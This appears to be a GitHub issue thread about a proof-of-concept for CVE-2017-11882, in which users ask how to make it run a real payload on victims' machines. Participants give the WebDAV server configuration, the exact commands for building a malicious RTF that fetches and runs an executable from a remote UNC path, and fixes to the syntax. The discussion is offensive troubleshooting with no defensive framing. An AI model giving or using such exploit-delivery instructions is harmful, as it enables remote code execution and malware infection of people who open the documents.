about exploit

[backtoback1]

Hi
can you please explain how to to use this POC
i tried many ways it's not working
i mean with real payload not calc.exe

python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf

but it's show me error

Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes

Thanks

[isabellah750]

Seems like that it uses UNC path, according to my understanding that is path to file shared on the network.

Although i am also interested to download file using http.

[shellerto]

Hi - i can't run thise exploite -
i use thise command
python webdav_exec_CVE-2017-11882.py -u \192.168.1.11\ff\sss.exe -e C:\Windows\system32\calc.exe -o test

and exploite massage

but not work word file

[kkkkkii]

Hello!

First of all you will need a properly configured HTTP server with WebDAV support (it's important obviously) in order to execute arbitrary binary on victims machine. It may be a tricky to configure HTTP server properly. I am using apache httpd on Centos 6 machine. Your setup should support anonymous authentication and file locking. So I have something like this in my httpd.conf

Alias /dav "/var/www/dav"
<IfModule dav_lock_module>
    DavLockDB "/var/www/dav"
</IfModule>
<Directory "/var/www/dav">
    Header set Access-Control-Allow-Origin "*"
    Dav On
</Directory>

Something may be missed, because now I cannot remember exactly how I configured it.

After you properly configured HTTP server, make sure that your WebDAV folder is accessible from the outside and executable files can be launched from this location. For example with Win+R shortcut.

WebDAV uses HTTP as transport and can be accessed with UNC path just like SMB.
That's why you should create sample exploit file with UNC paths:

python webdav_exec_CVE-2017-11882.py -u \\192.168.1.166\dav -e \\192.168.1.166\dav\1.exe -o test.rtf

In fact first UNC path can be just any UNC path which comply with command length limitation.
It is used to trigger start of WebClient service.

If everything is configured right you can launch your binary on a victims machine. Hope that helps.

I will update README.md ASAP and close this issue.

[backtoback1]

@kkkkkii

can you explain that step by step
i edit the webdav and i can access files from another pc
but with word it's show me this error

https://image.prntscr.com/image/fSzsc4ruSCGFv31qxBInPQ.png

[kkkkkii]

@backtoback1

According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe \ is considered as a special symbol by your shell where you execute this script. If you can run your payload with Win+R box with UNC path \\192.168.1.166\webdav\1.exe, then you can do this with exploit.

[isabellah750]

I am still confused how it is working.

[kalifan]

hi guys for any reason the exploits does not works fine, maybe must use this: "//" and not "\" i have been this problem.
As seen when you use kali linux the correct way is this:

python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf

thanks good job!!

[eternal1502]

Hi, so I connected my local PC to my cpanel thru webdisk and after some trials, I was able to get the exploit to work and execute payload on my local PC. But wen I run the same file on another PC which is not connected to my cpanel webdisk, it does not download the payload.